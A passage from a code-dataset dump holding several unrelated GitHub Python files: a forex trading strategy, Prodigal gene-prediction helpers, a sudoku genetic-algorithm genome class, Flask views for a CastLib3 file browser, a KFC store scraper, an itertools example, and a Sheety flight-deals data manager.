\n if ((price <= float(0.995) * float(cost_basis)) or (price >= float(1.01) * float(cost_basis))):\n self.SetHoldings(self.trading_symbol, 0)\n self.long_list.remove(self.trading_symbol)\n self.Debug(\"liquidate long\")\n \n if master_table.tail(1).iloc[0][4 + self.sym_n] == -1.0 and \\\n master_table.tail(1).iloc[0][5 + self.sym_n] == -1.0 and \\\n master_table.tail(1).iloc[0][6 + self.sym_n] == -1.0 and \\\n self.trading_symbol not in self.long_list and \\\n self.trading_symbol not in self.short_list :\n \n self.SetHoldings(self.trading_symbol, -1)\n self.short_list.append(self.trading_symbol)\n self.Debug(\"short\")\n \n if self.trading_symbol in self.short_list:\n \n cost_basis = self.Portfolio[self.trading_symbol].AveragePrice\n \n if ((price <= float(0.99) * float(cost_basis)) or (price >= float(1.005) * float(cost_basis))):\n self.SetHoldings(self.trading_symbol, 0)\n self.short_list.remove(self.trading_symbol)\n self.Debug(\"liquidate short\")\n\n # Reverse the Currency Pair Ratio\n def reverseCurr(self, prices_in_df, extra_sym):\n \n for i in extra_sym:\n prices_in_df[i] = 1/prices_in_df[i]\n \n return prices_in_df\n\n # Run the Prediction Model\n def predict(self, model, prices_in_df, period, threshold):\n\n # Number of Rolling Windows\n no_of_windows = int(len(prices_in_df) / period)\n # Total Number of Records Processable (To Prevent Index Out of Bounds)\n length = no_of_windows * period\n \n '''\n Debug 3: Checking all Obtained Parameters are Correct\n '''\n #self.Debug(\"Model: \" + model)\n #self.Debug(\"Period: \" + str(period))\n #self.Debug(\"Threshold: \" + str(threshold))\n #self.Debug(\"Length of Dataframe: \" + str(len(prices_in_df)))\n #self.Debug(\"No of Windows: \" + str(no_of_windows))\n #self.Debug(\"Length: \" + str(length))\n \n # Subsetting Latest N Records that is Within Range\n prices_in_df = prices_in_df[-(length):]\n \n signals = [] # List of Signals\n dates = [] # List of Dates\n \n # For Each Window\n for i in range(0, no_of_windows - 2):\n \n # Retrieve Projection Scores & Weights from Principle Component Analysis\n proj_scores = self.PCA(prices_in_df[(i * period):((i + 3) * period)]) \n \n '''\n Debug 5: Checking Projection Scores\n '''\n #self.Debug(\"Projection Scores: \")\n #self.Debug(proj_scores.head(5))\n \n # Retrieve Technical Indicators (Extended Features)\n predictor_in_df = self.indicator(period, proj_scores)\n \n '''\n Debug 6: Checking Technical Indicators\n '''\n #self.Debug(\"Technical Indicators: \")\n #self.Debug(predictor_in_df.head(5))\n \n ''' Get Train & Test Data [User-Defined Sizes] '''\n train_x = predictor_in_df[:int(len(predictor_in_df) / 2)]\n train_y = self.generateSignal(proj_scores[int(len(proj_scores) / 3 - 1):int(len(proj_scores) / 3 * 2)],\\\n threshold)\n test_x = predictor_in_df[int(len(predictor_in_df) / 2):]\n \n '''\n Debug 8: Checking Test and Train Data\n '''\n #self.Debug(\"Train X: \")\n #self.Debug(train_x.head(5)) \n #self.Debug(\"Generated Train Data Signals: \")\n #self.Debug(train_y.head(5)) \n #self.Debug(\"Test X: \")\n #self.Debug(test_x.head(5)) \n \n # Get List of Predictions\n prediction_in_list = self.classifier(model, train_x, train_y.values.ravel(), test_x)\n \n '''\n Debug 9: Checking Predictions from Ensemble\n '''\n #self.Debug(\"Predictions from Ensemble: \")\n #self.Debug(prediction_in_list) \n \n dates.extend(test_x.index) # Populate List of Dates\n signals.extend(prediction_in_list) # Populate List of Signals\n \n # Converting List of Signals & Dates into DataFrame\n return pd.DataFrame({'signal': signals}, index = dates)\n \n # Principle Component Analysis \n def PCA(self, prices_in_df):\n #self.Debug(\"INSIDE PCA\")\n \n # Normalize all Values in DataFrame\n normalized_price = (prices_in_df - prices_in_df.mean())/prices_in_df.std()\n\n # Obtain Sample Covariance by \n # 1. Taking 'normalized_price' DataFrame as a Matrix\n # 2. Transposing it\n # 3. Executing Dot Product on Original Against Transposed 'normalized_price'\n # 4. Dividing by Length of Matrix\n covariance = normalized_price.T.dot(normalized_price) / (len(normalized_price) - 1) \n \n '''\n Debug 4: Checking if Prices are Normalized and Sample Covariance Values Are Obtained Properly\n '''\n #self.Debug(\"Normalized Price: \")\n #self.Debug(normalized_price.head(5))\n #self.Debug(\"Covariance: \")\n #self.Debug(covariance.head(5))\n \n # Retrieve Eigen Decomposition of Sample Covariance Matrix\n eigenvalues, eigenvectors = np.linalg.eig(covariance.dropna())\n \n # Retrieve Projection Scores by\n # 1. Taking 'normalized_price' DataFrame and 'eigenvectors[0]' as Matrices\n # 2. Transposing 'eigenvectors[0]'\n # 2. Executing Dot Product on 'normalized_price' Against the Transposed 'eigenvectors[0]' \n proj_scores = normalized_price.dot(eigenvectors[0].T)\n \n return proj_scores\n \n # Generating Technical Indicators\n def indicator(self, period, proj_scores):\n\n # Relative position\n Relative_Position = []\n for i in range(period, len(proj_scores)):\n Relative_Position.append((proj_scores[i] - min(proj_scores[(i - period):i])) \\\n /(max(proj_scores[(i - period):i]) - min(proj_scores[(i - period):i])))\n \n # Relative Strength Index \n RSI = talib.RSI(np.array(proj_scores), period)\n RSI = RSI[~np.isnan(RSI)]\n \n # Momentum\n MOM = (proj_scores / proj_scores.shift(period)).dropna() * 100\n \n # Moving Average Convergence-Divergence\n MACD_slow = period\n MACD_fast = int(floor(period * 0.5))\n MACD, MACD_signal, MACD_hist = talib.MACDEXT(np.array(proj_scores), fastperiod = MACD_fast, \\\n fastmatype = MA_Type.EMA, slowperiod = MACD_slow, \\\n slowmatype = MA_Type.EMA, signalperiod = 2, \\\n signalmatype = 0)\n MACD = MACD[~np.isnan(MACD)]\n \n # All Technical Indicators as Independent Variables for Prediction Models in DataFrame\n predictor_in_df = pd.DataFrame({'RP': Relative_Position, 'RSI': RSI, 'MOM': MOM, 'MACD': MACD}, \\\n index = proj_scores.index[period:])\n \n return predictor_in_df\n \n # Generating Response Variables\n def generateSignal(self, proj_scores, threshold):\n\n signals = [] # List of Signals\n percentage_change = proj_scores.pct_change().dropna() # Percentage Change Among Projection Scores\n \n '''\n Debug 7: Checking % Change of Projection Scores\n '''\n #self.Debug(\"% Change of Projection Scores: \")\n #self.Debug(percentage_change.head(5))\n \n # Generate Signals Based on Percentage Change of Projection Scores\n '''\n Signals:\n 1 - Take Long Position\n 0 - Hold Position\n -1 - Take Short Position\n '''\n for i in percentage_change:\n \n if i > threshold:\n signals.append(1)\n \n elif i < -threshold:\n signals.append(-1)\n \n else:\n signals.append(0)\n \n # Returns a DataFrame Consisting of Signals and Percentage Change Indexes\n return pd.DataFrame({'signal': signals}, index = percentage_change.index)\n \n # Generating Predicted Values from Classifiers\n def classifier(self, model, train_x, train_y, test_x):\n\n if model == 'LogisticRegression':\n model_execution = LogisticRegression()\n \n if model == 'DecisionTree':\n model_execution = tree.DecisionTreeClassifier()\n \n if model == 'RandomForest':\n model_execution = RandomForestClassifier(n_estimators = 100, max_depth = 2)\n \n model_execution = model_execution.fit(train_x, train_y)\n prediction_in_list = model_execution.predict(test_x)\n \n # Returns a List of Predictions\n return list(prediction_in_list)","repo_name":"nusfintech/Machine-Learning-Projects","sub_path":"Algorithmic Trading/Voting Ensemble Strategy/Ensemble_Maple.py","file_name":"Ensemble_Maple.py","file_ext":"py","file_size_in_byte":15754,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"5900177879","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPurpose\n-------\n\nThis module contains functions related to gene prediction\nwith Prodigal and extraction of coding sequences from\nFASTA records.\n\nCode documentation\n------------------\n\"\"\"\n\n\nimport os\nimport pickle\nimport subprocess\n\ntry:\n from utils import (file_operations as fo,\n fasta_operations as fao,\n iterables_manipulation as im)\nexcept:\n from CHEWBBACA.utils import (file_operations as fo,\n fasta_operations as fao,\n iterables_manipulation as im)\n\n\ndef check_prodigal_results(prodigal_results, output_directory):\n \"\"\" Determines if Prodigal could not predict genes for any input\n assembly.\n\n Parameters\n ----------\n prodigal_results : list\n List with gene prediction results from Prodigal.\n output_directory : str\n Path to the output directory where the file with information\n about failed cases will be written to.\n\n Returns\n -------\n A list with the following elements:\n failed : list\n List with the stderr for the cases that Prodigal\n failed to predict genes for.\n failed_file : str\n Path to the file with information about the failed\n cases.\n \"\"\"\n\n no_cds = [l for l in prodigal_results if l[1] == 0]\n errors = [l for l in prodigal_results if isinstance(l[1], str) is True]\n failed = no_cds + errors\n\n failed_file = os.path.join(output_directory, 'prodigal_stderr.tsv')\n if len(failed) > 0:\n lines = ['{0}\\t{1}'.format(l[0], l[1]) for l in failed]\n fo.write_lines(lines, failed_file)\n\n return [failed, failed_file]\n\n\ndef extract_genome_cds(reading_frames, contigs, starting_id):\n \"\"\" Extracts CDSs from contigs based on the start\n and stop codon positions determined by Prodigal.\n\n Parameters\n ----------\n reading_frames : str\n Path to the ORF file created by Prodigal.\n contigs : dict\n Dictionary with contig ids as keys and contig\n sequences as values.\n starting_id : int\n Integer identifier attributed to the first CDS\n and that will be incremented to serve as identifier\n for subsequent CDSs.\n\n Returns\n -------\n coding_sequences : dict\n Dictionary with coding sequences ids as keys and\n coding sequences as values.\n coding_sequences_info : list\n List with a sublist for each extracted CDS. Sublists\n have information about the extracted CDS (identifier\n of the contig the CDS was identified in, start position\n in the contig, stop position in the contig, sequence\n identifier attributed to that CDS and the strand that\n coded for that CDS).\n \"\"\"\n\n seqid = starting_id\n coding_sequences = {}\n coding_sequences_info = []\n for contig_id, frames in reading_frames.items():\n sequence = contigs[contig_id]\n # for each start and stop codon in the contig\n for cds in frames:\n start_pos = cds[0]\n stop_pos = cds[1]\n strand = cds[2]\n # extract CDS sequence\n cds_sequence = im.extract_single_cds(sequence, *cds).upper()\n\n # store CDS with unique id\n coding_sequences[seqid] = cds_sequence\n\n # store CDS information\n coding_sequences_info.append([contig_id, str(start_pos),\n str(stop_pos), str(seqid),\n str(strand)])\n\n # increment seqid\n seqid += 1\n\n return [coding_sequences, coding_sequences_info]\n\n\ndef write_protein_table(output_file, genome_id, cds_info):\n \"\"\" Writes information about coding sequences in a\n genome to a file.\n\n Parameters\n ----------\n output_file : str\n Path to the output file to which info will\n be saved.\n genome_id : str\n Identifier of the genome to add to first field\n of every new line.\n cds_info : list\n List with information about each coding sequence\n identified in the genome (contig identifier,\n CDS start position, CDS stop position, CDS\n identifier and CDS coding strand).\n \"\"\"\n\n table_lines = [[genome_id] + protein_info\n for protein_info in cds_info]\n table_lines = [im.join_list(line, '\\t') for line in table_lines]\n table_text = im.join_list(table_lines, '\\n')\n fo.write_to_file(table_text, output_file, 'a', '\\n')\n\n\ndef save_extracted_cds(genome, identifier, orf_file, protein_table, cds_file):\n \"\"\" Extracts coding sequences from a genome assembly based\n on Prodigal's gene predictions. Writes coding sequences\n to a FASTA file and information about coding sequences to\n a TSV file.\n\n Parameters\n ----------\n genome : str\n Path to the FASTA file with the FASTA sequences for\n a genome.\n identifier : str\n Genome identifier to add to FASTA records headers\n and to the first field in the TSV file.\n orf_file : str\n Path to the file with Prodigal results.\n protein_table : str\n Path to the TSV file to which coding sequences\n information will be written.\n cds_file : str\n Path to the FASTA file to which coding sequences\n will be written.\n\n Returns\n -------\n total_cds : int\n Total number of coding sequences extracted from\n the genome.\n \"\"\"\n\n # import contigs for current genome/assembly\n contigs = fao.import_sequences(genome)\n # extract coding sequences from contigs\n reading_frames = fo.pickle_loader(orf_file)\n genome_info = extract_genome_cds(reading_frames, contigs, 1)\n # save coding sequences to file\n # create records and write them to file\n cds_lines = fao.create_fasta_lines(genome_info[0], identifier)\n fo.write_lines(cds_lines, cds_file)\n\n write_protein_table(protein_table, identifier, genome_info[1])\n\n total_cds = len(genome_info[0])\n\n return total_cds\n\n\ndef cds_batch_extractor(genomes, prodigal_path, temp_directory, index):\n \"\"\" Extracts coding sequences from a set of genomes.\n\n Parameters\n ----------\n input_data : list\n List with a set of paths for FASTA files with\n genomic sequences, followed by the path to the\n directory with files with Prodigal resutls, the\n path to the temporary directory for all files and\n directories that will be read and written and\n an index/identifier to add to the output files\n with coding sequences and coding sequences info.\n\n Returns\n -------\n A list with the following elements:\n protein_table : str\n Path to the TSV file to which coding sequences\n info was written.\n cds_file : str\n Path to the FASTA file to which coding sequences\n were written.\n batch_total : int\n Total number of coding sequences extracted from\n the set of input genomes.\n \"\"\"\n\n protein_table = fo.join_paths(temp_directory,\n ['protein_info_{0}.tsv'.format(index)])\n\n cds_file = fo.join_paths(temp_directory,\n ['coding_sequences_{0}.fasta'.format(index)])\n\n batch_total = 0\n for g in genomes:\n # determine Prodigal ORF file path for current genome\n identifier = fo.file_basename(g, False)\n orf_file_path = fo.join_paths(prodigal_path,\n ['{0}_ORF.txt'.format(identifier)])\n total = save_extracted_cds(g, identifier, orf_file_path,\n protein_table, cds_file)\n batch_total += total\n\n return [protein_table, cds_file, batch_total]\n\n\ndef run_prodigal(input_file, translation_table, mode, ptf_path):\n \"\"\" Executes Prodigal.\n\n Parameters\n ----------\n input_file : str\n Path to input FASTA file.\n translation_table : int\n Genetic code.\n mode : str\n Prodigal execution mode ('single' is the default,\n 'meta' should be used to predict genes from smaller\n contigs).\n ptf_path : str or None\n Path to the training file.\n\n Returns\n -------\n stdout : bytes\n Prodigal's stdout.\n stderr : bytes\n Prodigal's stderr.\n \"\"\"\n\n if ptf_path is not None:\n proc = subprocess.Popen(['prodigal', '-i', input_file, '-c',\n '-m', '-g', str(translation_table), '-p',\n mode, '-f', 'sco', '-q', '-t', ptf_path],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n elif ptf_path is None:\n proc = subprocess.Popen(['prodigal', '-i', input_file, '-c',\n '-m', '-g', str(translation_table), '-p',\n mode, '-f', 'sco', '-q'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n # Read the stdout from Prodigal\n stdout = proc.stdout.readlines()\n stderr = proc.stderr.readlines()\n\n return [stdout, stderr]\n\n\ndef main(input_file, output_dir, ptf_path, translation_table, mode):\n\n stdout, stderr = run_prodigal(input_file, translation_table, mode, ptf_path)\n\n genome_basename = fo.file_basename(input_file, False)\n\n if len(stderr) > 0:\n stderr = [line.decode('utf-8').strip() for line in stderr]\n stderr = [line for line in stderr if line != '']\n error = ' '.join(stderr)\n return [input_file, error]\n\n # Parse output\n lines = [line.decode('utf-8').strip() for line in stdout]\n\n # determine contigs headers indexes\n contigs_headers = [l for l in lines if 'seqhdr' in l]\n contigs_ids = [l.split('\"')[1].split()[0] for l in contigs_headers]\n contigs_idx = [lines.index(l) for l in contigs_headers] + [len(lines)]\n\n # get CDSs' positions for each contig\n contigs_pos = {contigs_ids[i]: lines[contigs_idx[i]+1:contigs_idx[i+1]]\n for i in range(len(contigs_ids))}\n\n # exclude contigs without coding sequences\n contigs_pos = {k: v[1:] for k, v in contigs_pos.items() if len(v) > 1}\n\n strand_trans = {'+': 1, '-': 0}\n\n # split and convert list elements\n contigs_pos = {k: [p.split('_')[1:] for p in v]\n for k, v in contigs_pos.items()}\n contigs_pos = {k: [[int(p[0])-1, int(p[1]), strand_trans[p[2]]]\n for p in v] for k, v in contigs_pos.items()}\n\n total_contigs = {k: len(v) for k, v in contigs_pos.items()}\n total_genome = sum(total_contigs.values())\n\n if total_genome > 0:\n # save positions in file\n filepath = os.path.join(output_dir, genome_basename + '_ORF.txt')\n with open(filepath, 'wb') as f:\n pickle.dump(contigs_pos, f)\n\n status = [input_file, total_genome]\n\n return status\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"AMARTELKE/Whole-and-core-genomes-phylogeney","sub_path":"CHEWBBACA/utils/gene_prediction.py","file_name":"gene_prediction.py","file_ext":"py","file_size_in_byte":11466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33079028654","text":"import random\nimport copy\n\nCOPY_CHANCE = 1\nFRESH_CHANCE = 1\nCROSSOVER_CHANCE = 5\nSWAP_CHANCE = 3\n\nclass Genome:\n \"\"\"In this solution a genome is encoded as a list of elements and since in the sudoku problem the values appear the same number of times, as operations we will consider only operations that execute permutations within the elements of the gene.\n \"\"\"\n \n def __init__(self, initial, spawn_chances=None):\n \"\"\"The array spawn_chances is in the form of [(spawn_method, spawn_probability),(spawn_method2, spawn_probability2),...]\"\"\"\n\n \"\"\"Spawn chances are decidable in the variables, the operations implemented and possible as spawn are: copy [copies the current genes], fresh [creates fresh genes], crossover [executes a crossover between the two parents] and swap [randomly swaps two values inside of the genes: it's considered as a random mutation of the genetic code]\"\"\"\n\n self.spawn_chances = ((Genome.copy, COPY_CHANCE),\n (Genome.fresh, FRESH_CHANCE),\n (Genome.crossover, CROSSOVER_CHANCE),\n (Genome.swap, SWAP_CHANCE))\n\n self.genes = copy.copy(initial)\n self.total_target = sum(chance for _, chance in self.spawn_chances) # The total of chances\n self.partner = None\n\n def spawn(self, partner):\n \"\"\"Uses a partner to spawn a new child (it could potentially not use the partner's genetic code, in the case of the copy, fresh or mutation\"\"\"\n self.partner = partner\n rnd = random.randrange(self.total_target)\n i = 0\n for spawn_function, spawn_chance in self.spawn_chances:\n if rnd < i + spawn_chance:\n child = spawn_function(self)\n break\n i += spawn_chance\n\n del self.partner # memory purpose\n return child\n\n def copy(self, genes=None):\n # Maybe could be useful to initialize genes\n return Genome(self.genes, self.spawn_chances)\n \n def fresh(self):\n child = self.copy()\n random.shuffle(child.genes) # shuffles the list of values\n return child\n\n def swap(self):\n child = self.copy()\n i = random.randrange(len(child.genes))\n j = random.randrange(len(child.genes)) # There is not a control to check whether the two values are different, so there is a probability of 1/6561 of having a copy, let's just let nature and randomness do their thing\n child.genes[i], child.genes[j] = child.genes[j], child.genes[i]\n return child\n\n def crossover(self):\n genes1 = self.genes[:]\n genes2 = self.partner.genes[:]\n\n # Create a conflict vector that stores the position of the conflicts between the corresponding cells and fills the result array with nothing, in order to go back after the first cycle where equality is check.\n result = []\n i = 0\n conflicts = []\n while i < len(genes1):\n if genes1[i] == genes2[i]:\n result.append(genes1[i])\n genes1.pop(i)\n genes2.pop(i)\n else:\n conflicts.append(len(result))\n result.append(None)\n i += 1\n\n for i in conflicts:\n # 50% chance of using the first gene to choose the current value \n if random.random() < 0.5:\n result[i] = genes1[0]\n genes2.remove(genes1.pop(0))\n # Remove the selected element from the gene1 and then removes the same element (a number in this sudoku case) from the second gene in order to keep the same quantity of equals figures inside of the gene representing the sudoku [it's necessary to permutate the values in every reproductive operation inside of this class]\n else:\n result[i] = genes2[0]\n genes1.remove(genes2.pop(0))\n\n return Genome(result, self.spawn_chances) \n \n\n \"\"\"\n result = []\n i = 0\n conflicts = []\n\n print(\"GENE1 SIZE: \" + str(len(genes1)))\n print(\"GENE2 SIZE: \" + str(len(genes2)))\n\n while i < len(genes1):\n print(\"INDEX: \" + str(i))\n if genes1[i] == genes2[i]:\n result.append(genes1[i])\n genes1.pop(i)\n genes2.pop(i)\n else: \n if random.random() < 0.5:\n to_append = genes1[i]\n else: \n to_append = genes2[i]\n result.append(to_append)\n genes1.remove(to_append)\n genes2.remove(to_append)\n\n \n return Genome(result, self.spawn_chances) \n \n print(conflicts)\n print(\" CONFLICTS LENGTH: \" + str(len(conflicts)))\n\n for conflict_position in conflicts:\n if random.random() < 0.5: \n # 50% chance of using the first gene to choose the current value \n result[conflict_position] = genes1[0]\n to_remove = genes1.pop(0)\n print(\"To remove: \" + str(to_remove)) # Remove the selected element from the gene1 and then removes the same element (a number in this sudoku case) from the second gene in order to keep the same quantity of equals figures inside of the gene representing the sudoku [it's necessary to permutate the values in every reproductive operation inside of this class]\n\n else:\n result[conflict_position] = genes2[0]\n to_remove = genes2.pop(0)\n print(\"To remove: \" + str(to_remove))\n genes1.remove(to_remove)\n # By popping we keep the memory clean and the index of the next element is always gonna be 0\n \"\"\" \n","repo_name":"tommaso-sacchetti/Sudoku-AI-Solver","sub_path":"genetic algorithm/genome.py","file_name":"genome.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71127509992","text":"from __future__ import print_function\n\nimport os, re, json, yaml\nfrom flask import Blueprint, render_template, request, url_for\nfrom flask.views import MethodView as FlaskMethodView\nfrom flask_api import status as HTTP_STATUS_CODES\nfrom collections import OrderedDict\n\nfrom castlib3.logs import gLogger\nfrom castlib3.models.filesystem import Folder, File, FSEntry\nfrom castlib3.exec_utils import initialize_database, ordered_load, discover_locations\n\nimport sVresources.db.instance\nfrom sVresources import apps\nfrom sVresources.utils.contentType import expected_content_type\nfrom sVresources.utils.queueTools import DelayedTaskViewMetaclass, CachedTaskView\nfrom hashlib import md5\n\nbp = Blueprint('cstl3', __name__,\n template_folder='templates',\n static_folder='static',\n url_prefix='/rawstat')\n\ngAvailableTasks = {}\n\ndef ordered_load(stream, Loader=yaml.Loader, object_pairs_hook=OrderedDict):\n class OrderedLoader(Loader):\n pass\n def construct_mapping(loader, node):\n loader.flatten_mapping(node)\n return object_pairs_hook(loader.construct_pairs(node))\n OrderedLoader.add_constructor(\n yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,\n construct_mapping)\n return yaml.load(stream, OrderedLoader)\n\ndef append_tasks_dict( dct, key, content ):\n existingSingle = dct.get(key, None)\n existingMultiple = dct.get(key + '-1', None)\n if not (existingSingle or existingMultiple):\n dct[key] = content\n return\n # Task with similar name exists. Re-insert it incrementing index by one.\n if existingSingle:\n dct.pop(key)\n dct[key + '-1'] = existingSingle\n dct[key + '-2'] = content\n return\n # Multiple tasks with similar name:\n latestIdx = int(key.split('-')[-1:]) + 1\n dct[key + '_%d'%latestIdx] = content\n\ndef discover_stages( path ):\n ret = {}\n if not path:\n return ret\n subdirs = []\n for e in os.listdir(path):\n ePath = os.path.join( path, e )\n if os.path.isfile( ePath ) and re.match( \"^.+\\.yml$\", e ):\n taskName = e[:-4]\n taskContent = None\n with open(ePath) as f:\n taskContent = ordered_load(f)\n if taskContent.get('stages', None):\n taskContent['_location'] = ePath\n append_tasks_dict( ret, taskName, taskContent )\n elif os.path.isdir( ePath ):\n subdirs.append( ePath )\n for e in subdirs:\n sRet = discover_stages( e )\n ret.update(sRet)\n return ret\n\ndef configure( *args, **kwargs ):\n tasksCatalogues=kwargs.get( 'cstlStagesDirs', None )\n if tasksCatalogues is not None:\n for e in tasksCatalogues:\n if os.path.exists(e) and os.path.isdir(e):\n gAvailableTasks.update( discover_stages( e ) )\n gLogger.info( \"%d CastLib tasks have been discovered in \\\"%s\\\"\"%(\n len(gAvailableTasks), e) )\n else:\n gLogger.warning( 'Path \"%s\" is not reachable or does not refer '\n 'to a directory. Can not extract CastLib tasks from '\n 'there.'%e )\n else:\n gLogger.warning( \"No \\\"cstlStagesDirs\\\" parameter is given.\" )\n\ndef follow_path( path ):\n folderEntry = apps.query(Folder).filter( Folder.name=='$root' ).first()\n if not folderEntry:\n return None # no root --- table is empty\n pToks = []\n path_ = path\n while True:\n path_, head = os.path.split(path_)\n pToks.append(head)\n if not head:\n break\n pToks.reverse()\n for pEntry in pToks[1:]:\n folderEntry = apps.db.query(Folder).filter(\n FSEntry.parent==folderEntry,\n FSEntry.name==pEntry).first()\n return folderEntry\n\n#\n# Filesystem\n\n@bp.route('/observe/castlib3-files', methods=['GET'])\ndef observe_filesystem():\n \"\"\"\n Web view returning browseable HTML page.\n \"\"\"\n return render_template( 'pages/observe-files.html'\n , AJAXTreeAddr='castlib3-files-ajax'\n , AJAXGroupDetails=url_for('cstl3.folder_details')\n , AJAXItemDetails=url_for('cstl3.file_details')\n , AJAXParameters=['path']\n , groupFields=['path'] )\n\n@bp.route('/observe/castlib3-files-ajax', methods=['POST'])\n@expected_content_type\ndef filesystem_entries():\n \"\"\"\n Returns castlib3 filesystem tree queries in form suitable for zTree.\n \"\"\"\n path = request.form.get( 'path', '/' )\n folderEntry = follow_path( path )\n if not folderEntry:\n return [], HTTP_STATUS_CODES.HTTP_200_OK # database is empty\n ret = []\n for entry in folderEntry.children.values():\n vPath = os.path.join( path if path else '/', entry.name )\n ret.append({\n 'name' : entry.name,\n 'isParent' : 'd' == entry.type,\n 'path' : vPath\n })\n return ret, HTTP_STATUS_CODES.HTTP_200_OK\n\n@bp.route('/observe/castlib3-file-details-ajax', methods=['GET'])\n@expected_content_type\ndef file_details():\n path = request.args.get( 'path' )\n if not path:\n return {'details' : 'request did not submitted path'}, \\\n HTTP_STATUS_CODES.HTTP_400_BAD_REQUEST\n folderPath, filename = os.path.split(path)\n folderEntry = follow_path( folderPath )\n if not folderEntry:\n return {}, HTTP_STATUS_CODES.HTTP_404_NOT_FOUND\n fileEntry = DB.session.query(File) \\\n .filter( File.parent==folderEntry,\n File.name==filename ).first()\n return fileEntry.as_dict(), HTTP_STATUS_CODES.HTTP_200_OK\n\n@bp.route('/observe/castlib3-folder-details-ajax', methods=['GET'])\n@expected_content_type\ndef folder_details():\n path = request.args.get( 'path' )\n if not path:\n return {'details' : 'request did not submitted path'}, \\\n HTTP_STATUS_CODES.HTTP_400_BAD_REQUEST\n folderEntry = follow_path(path)\n if not folderEntry:\n return {}, HTTP_STATUS_CODES.HTTP_404_NOT_FOUND\n return folderEntry.as_dict(), HTTP_STATUS_CODES.HTTP_200_OK\n\n\n#\n# Long-running operations\n\n@bp.route('/manage', methods=['GET'])\ndef manage_cstl3():\n extendedTasks = {}\n for k, v in gAvailableTasks.iteritems():\n extendedTasks[k] = {\n 'comment' : v.get('comment', '(No comment available.)')\n , 'runnable' : v.get('runnable', False)\n , 'stagesJS' : json.dumps( v['stages'] )\n , 'fileLocation' : v['_location']\n }\n return render_template('pages/manage.html'\n , availableTasks=extendedTasks)\n\nclass BaseCSTL3View(FlaskMethodView):\n \"\"\"\n View class implementing generic castlib3 routines related to sV-resources\n server.\n \"\"\"\n pass\n\nclass Castlib3TaskView( BaseCSTL3View, CachedTaskView ):\n \"\"\"\n This view is responsible for delayed cstl3 launch.\n \"\"\"\n __metaclass__ = DelayedTaskViewMetaclass\n __delayedTaskParameters = {\n 'queue' : 'cstl3',\n 'import' : 'castlib3.sVbp.tasks.castlib3_stages'\n }\n\n @staticmethod\n def args_digest( stageName\n , stages=[]\n , externalImport=[]\n , directories=None # TODO: use after cpickle\n ):\n return md5(stageName).hexdigest()\n\n def get(self, stageName):\n stagesDescription = gAvailableTasks.get( stageName, None )\n if not stagesDescription:\n abort( HTTP_STATUS_CODES.HTTP_404_NOT_FOUND )\n return super( Castlib3TaskView, self).delayed_retrieve( self\n , stageName\n , stages=stagesDescription['stages']\n , externalImport=stagesDescription.get('external-import', [])\n , directories=None # TODO\n )\n\n def post(self, stageName):\n stagesDescription = gAvailableTasks.get( stageName, None )\n if not stagesDescription:\n abort( HTTP_STATUS_CODES.HTTP_404_NOT_FOUND )\n pass\n\nbp.add_url_rule( '/run/',\n view_func=Castlib3TaskView.as_view('run_stage') )\n\nsVresources_Blueprint = bp\nsVresources_ObservablePages = [\n # title, destination\n ('CASTOR entries', 'cstl3.observe_filesystem')\n , ('Manage CastLib tasks', 'cstl3.manage_cstl3')\n # ('API reference', 'extGDML.reference') # TODO\n ]\n\n","repo_name":"CrankOne/castlib","sub_path":"sVbp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3628973311","text":"import requests\r\nimport json\r\nif __name__==\"__main__\":\r\n post_url = 'http://www.kfc.com.cn/'\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'\r\n }\r\n city = input('输入城市:')\r\n data = {\r\n 'cname':'',\r\n 'pid':'',\r\n 'keyword': city,\r\n 'pageIndex':'1',\r\n 'oageSize':'40'\r\n }\r\n response = requests.get(url=post_url,data=data,headers=headers)\r\n json_data = requests.json()\r\n with open('./{}.jsonformat(w)','w',encoding='utf-8') as fp:\r\n json.dump(json_data,fp,ensure_ascii=False)\r\n print(\"查询完毕!!\")","repo_name":"zhoujian-111/PYTHON","sub_path":"ZHOU/python爬虫/肯德基餐厅信息.py","file_name":"肯德基餐厅信息.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14774245954","text":"\"\"\"\n问题\n你想在多个对象执行相同的操作,但是这些对象在不同的容器中,你希望代码在不 失可读性的情况下避免写重复的循环。\n解决方案\nitertools.chain() 方法可以用来简化这个任务。它接受一个可迭代对象列表作 为输入,并返回一个迭代器,有效的屏蔽掉在多个容器中迭代细节。为了演示清楚,考 虑下面这个例子:\n\"\"\"\n\nfrom itertools import chain\na = [1, 2, 3, 4]\nb = ['x', 'y', 'z']\n\nfor x in chain(a, b):\n print(x)\n\n# itertools.chain() 接受一个或多个可迭代对象最为输入参数。然后创建一个迭 代器,依次连续的返回每个可迭代对象中的元素。\n","repo_name":"ayumi64/Python_Cookbook_Learn","sub_path":"Section04 迭代器与生成器/4.12 不同集合上元素的迭代.py","file_name":"4.12 不同集合上元素的迭代.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7319927594","text":"import requests\n\nSHEETY_PRICES_ENDPOINT = \"https://api.sheety.co/a1ce99ba2602220bd65c82a7dd0ac763/flightDeals/prices\"\n\n\nclass DataManager:\n def __init__(self):\n self.sheet_data = {}\n\n # Reading data from Sheet\n def read_sheet(self):\n sheet_response = requests.get(url=SHEETY_PRICES_ENDPOINT)\n data = sheet_response.json()\n self.sheet_data = data[\"prices\"]\n return self.sheet_data\n\n # Update data to Sheet\n def update_sheet(self):\n for city in self.sheet_data:\n new_data = {\n \"price\": {\n \"iataCode\": 